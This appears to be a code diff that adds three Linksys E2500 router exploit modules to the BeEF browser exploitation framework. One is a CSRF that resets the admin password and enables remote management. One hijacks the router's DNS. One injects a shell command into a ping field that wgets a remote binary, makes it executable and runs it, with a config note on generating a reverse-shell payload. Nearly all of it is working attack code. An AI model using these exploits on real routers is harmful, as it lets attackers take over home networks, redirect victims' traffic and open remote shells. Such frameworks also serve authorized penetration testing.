linksyse2500

modules/exploits/router/linksys_e2500_csrf/command.js

@@ -0,0 +1,47 @@
+//
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+  var port    = '<%= @port %>';
+  var gateway = '<%= @base %>'; 
+  var passwd  = '<%= @password %>';
+  var timeout = 15;
+
+  var e2500_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST", "application/x-www-form-urlencoded",
+       [{'type':'hidden', 'name':'submit_button', 'value':'Management'} ,
+       {'type':'hidden', 'name':'change_action', 'value':''},
+       {'type':'hidden', 'name':'action', 'value':'Apply'},
+       {'type':'hidden', 'name':'PasswdModify', 'value':'1'},
+       {'type':'hidden', 'name':'http_enable', 'value':'1'},
+       {'type':'hidden', 'name':'https_enable', 'value':'0'},
+       {'type':'hidden', 'name':'ctm404_enable', 'value':''},
+       {'type':'hidden', 'name':'remote_mgt_https', 'value':'1'},
+       {'type':'hidden', 'name':'wait_time', 'value':'4'},
+       {'type':'hidden', 'name':'need_reboot', 'value':'0'},
+       {'type':'hidden', 'name':'http_passwd', 'value':passwd},
+       {'type':'hidden', 'name':'http_passwdConfirm', 'value':passwd},
+       {'type':'hidden', 'name':'_http_enable', 'value':'1'},
+       {'type':'hidden', 'name':'_https_enable', 'value':'0'},
+       {'type':'hidden', 'name':'web_wl_filter', 'value':'0'},
+       {'type':'hidden', 'name':'remote_management', 'value':'1'},
+       {'type':'hidden', 'name':'_remote_mgt_https', 'value':'0'},
+       {'type':'hidden', 'name':'remote_upgrade', 'value':'1'},
+       {'type':'hidden', 'name':'remote_ip_any', 'value':'1'},
+       {'type':'hidden', 'name':'http_wanport', 'value':port},
+       {'type':'hidden', 'name':'nf_alg_sip', 'value':'0'},
+       {'type':'hidden', 'name':'upnp_enable', 'value':'1'},
+       {'type':'hidden', 'name':'upnp_config', 'value':'1'},
+       {'type':'hidden', 'name':'upnp_internet_dis', 'value':'0'}
+      ]);
+  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+  cleanup = function() {
+    document.body.removeChild(e2500_iframe_<%= @command_id %>);
+  }
+  setTimeout("cleanup()", timeout*1000);
+
+});
+

modules/exploits/router/linksys_e2500_csrf/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        linksys_e2500_csrf:
+            enable: true
+            category: ["Exploits", "Router"]
+            name: "Linksys E2500 CSRF"
+            description: "Attempts to enable remote administration and change the password on a Linksys E2500 router."
+            authors: ["Esteban Rodriguez"]
+            target:
+                working: ["ALL"]

modules/exploits/router/linksys_e2500_csrf/module.rb

@@ -0,0 +1,20 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Linksys_e2500_csrf < BeEF::Core::Command
+  
+  def self.options
+    return [
+        {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.1/'}, 
+        {'name' => 'port', 'ui_label' => 'Desired port', 'value' => '31337'}, 
+        {'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}  
+    ]
+  end
+  
+  def post_execute
+    save({'result' => @datastore['result']})
+  end
+  
+end

modules/exploits/router/linksys_e2500_dns_hijack/command.js

@@ -0,0 +1,64 @@
+//
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	// config
+	var target  = 'http://<%= @rhost %>/apply.cgi';
+	var dns1    = '<%= @dns1 %>';
+	var timeout = 15;
+
+	// validate primary DNS server IP address
+	var parts = dns1.split('.');
+	if (parts.length != 4) {
+		beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Primary DNS server IP address was provided");
+		return;
+	}
+	for (var i=0; i<parts.length; i++) {
+		var part = parts[i];
+		if (isNaN(part) || part < 0 || part > 255) {
+			beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Primary DNS server IP address was provided");
+			return;
+		}
+	}
+	
+	// change DNS
+	var linksys_e2500_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(target, "POST", "application/x-www-form-urlencoded", [
+                {'type':'hidden', 'name':'submit_button', 'value': 'index'},
+                {'type':'hidden', 'name':'change_action', 'value': ''},
+                {'type':'hidden', 'name':'submit_type', 'value': ''},
+				{'type':'hidden', 'name':'action', 'value': 'Apply'},
+				{'type':'hidden', 'name':'wan_dns', 'value': '4'},
+				{'type':'hidden', 'name':'wan_dns0_0', 'value': parts[0]},
+				{'type':'hidden', 'name':'wan_dns0_1', 'value': parts[1]},
+				{'type':'hidden', 'name':'wan_dns0_2', 'value': parts[2]},
+				{'type':'hidden', 'name':'wan_dns0_3', 'value': parts[3]},
+				{'type':'hidden', 'name':'wan_dns1_0', 'value': '0'},
+				{'type':'hidden', 'name':'wan_dns1_1', 'value': '0'},
+				{'type':'hidden', 'name':'wan_dns1_2', 'value': '0'},
+				{'type':'hidden', 'name':'wan_dns1_3', 'value': '0'},
+				{'type':'hidden', 'name':'wan_dns2_0', 'value': '0'},
+				{'type':'hidden', 'name':'wan_dns2_1', 'value': '0'},
+				{'type':'hidden', 'name':'wan_dns2_2', 'value': '0'},
+				{'type':'hidden', 'name':'wan_dns2_3', 'value': '0'},
+				{'type':'hidden', 'name':'wan_wins', 'value': '4'},
+				{'type':'hidden', 'name':'wan_wins_0', 'value': '0'},
+				{'type':'hidden', 'name':'wan_wins_1', 'value': '0'},
+				{'type':'hidden', 'name':'wan_wins_2', 'value': '0'},
+				{'type':'hidden', 'name':'wan_wins_3', 'value': '0'},
+
+	]);
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+	// clean up
+	cleanup = function() {
+		document.body.removeChild(linksys_e2500_iframe_<%= @command_id %>);
+	}
+	setTimeout("cleanup()", timeout*1000);
+
+});
+

modules/exploits/router/linksys_e2500_dns_hijack/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        linksys_e2500_dns_hijack:
+            enable: true
+            category: ["Exploits", "Router"]
+            name: "Linksys E2500 DNS Hijack"
+            description: "Attempts to change the DNS setting on a Linksys E2500 router."
+            authors: ["Esteban Rodriguez"]
+            target:
+                working: ["ALL"]

modules/exploits/router/linksys_e2500_dns_hijack/module.rb

@@ -0,0 +1,19 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Linksys_e2500_dns_hijack < BeEF::Core::Command
+  
+	def self.options
+		return [
+			{'name' => 'rhost', 'ui_label' => 'Remote Host', 'value' => '192.168.1.1'},
+			{'name' => 'dns1', 'ui_label' => 'Primary DNS Server', 'value' => '8.8.8.8'},
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end

modules/exploits/router/linksys_e2500_shell/command.js

@@ -0,0 +1,46 @@
+//
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+  var base    = '<%= @base %>';
+  var payload = '<%= @payload %>';
+  var random = Math.random().toString(36).substring(7);
+  var timeout = 15;
+
+
+  var e2500_iframe_2<%= @command_id %> = beef.dom.createIframeXsrfForm(base + "apply.cgi", "POST", "application/x-www-form-urlencoded",
+      [{'type':'hidden', 'name':'submit_button', 'value':'Diagnostics'} ,
+       {'type':'hidden', 'name':'change_action', 'value':'gozila_cgi'},
+       {'type':'hidden', 'name':'submit_type', 'value':'start_ping'},
+       {'type':'hidden', 'name':'action', 'value':''},
+       {'type':'hidden', 'name':'commit', 'value':'0'},
+       {'type':'hidden', 'name':'ping_ip', 'value':'192.168.1.1'},
+       {'type':'hidden', 'name':'ping_size', 'value':'&/tmp/' + random +'&'},
+       {'type':'hidden', 'name':'ping_times', 'value':'5'},
+       {'type':'hidden', 'name':'traceroute_ip', 'value':''},
+      ]);
+
+  var e2500_iframe_1<%= @command_id %> = beef.dom.createIframeXsrfForm(base + "apply.cgi", "POST", "application/x-www-form-urlencoded",
+      [{'type':'hidden', 'name':'submit_button', 'value':'Diagnostics'} ,
+       {'type':'hidden', 'name':'change_action', 'value':'gozila_cgi'},
+       {'type':'hidden', 'name':'submit_type', 'value':'start_ping'},
+       {'type':'hidden', 'name':'action', 'value':''},
+       {'type':'hidden', 'name':'commit', 'value':'0'},
+       {'type':'hidden', 'name':'ping_ip', 'value':'192.168.1.1'},
+       {'type':'hidden', 'name':'ping_size', 'value':'&/usr/bin/wget ' + payload + ' -O /tmp/' + random + ';chmod 777 /tmp/' + random + '&'},
+       {'type':'hidden', 'name':'ping_times', 'value':'5'},
+       {'type':'hidden', 'name':'traceroute_ip', 'value':''},
+      ]);
+  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+  cleanup = function() {
+    document.body.removeChild(e2500_iframe_1<%= @command_id %>);
+    document.body.removeChild(e2500_iframe_2<%= @command_id %>);
+  }
+  setTimeout("cleanup()", timeout*1000);
+
+});
+

modules/exploits/router/linksys_e2500_shell/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        linksys_e2500_shell:
+            enable: true
+            category: ["Exploits", "Router"]
+            name: "Linksys E2500 Shell"
+            description: "Attempts to exploit a command execution vulnerability on a Linksys E2500 router. <br> It will wget a binary payload to the temp directory, change permissions, and run the binary.<br>Command to generate payload: <b>msfpayload linux/mipsle/shell_reverse_tcp LHOST=[Attacker IP]  X > reverse</b>"
+            authors: ["Esteban Rodriguez"]
+            target:
+                working: ["ALL"]

modules/exploits/router/linksys_e2500_shell/module.rb

@@ -0,0 +1,19 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Linksys_e2500_shell < BeEF::Core::Command
+  
+  def self.options
+    return [
+        {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.1/'}, 
+        {'name' => 'payload', 'ui_label' => 'Path to exploit payload', 'value' => 'http://192.0.2.2/payload'}, 
+    ]
+  end
+  
+  def post_execute
+    save({'result' => @datastore['result']})
+  end
+  
+end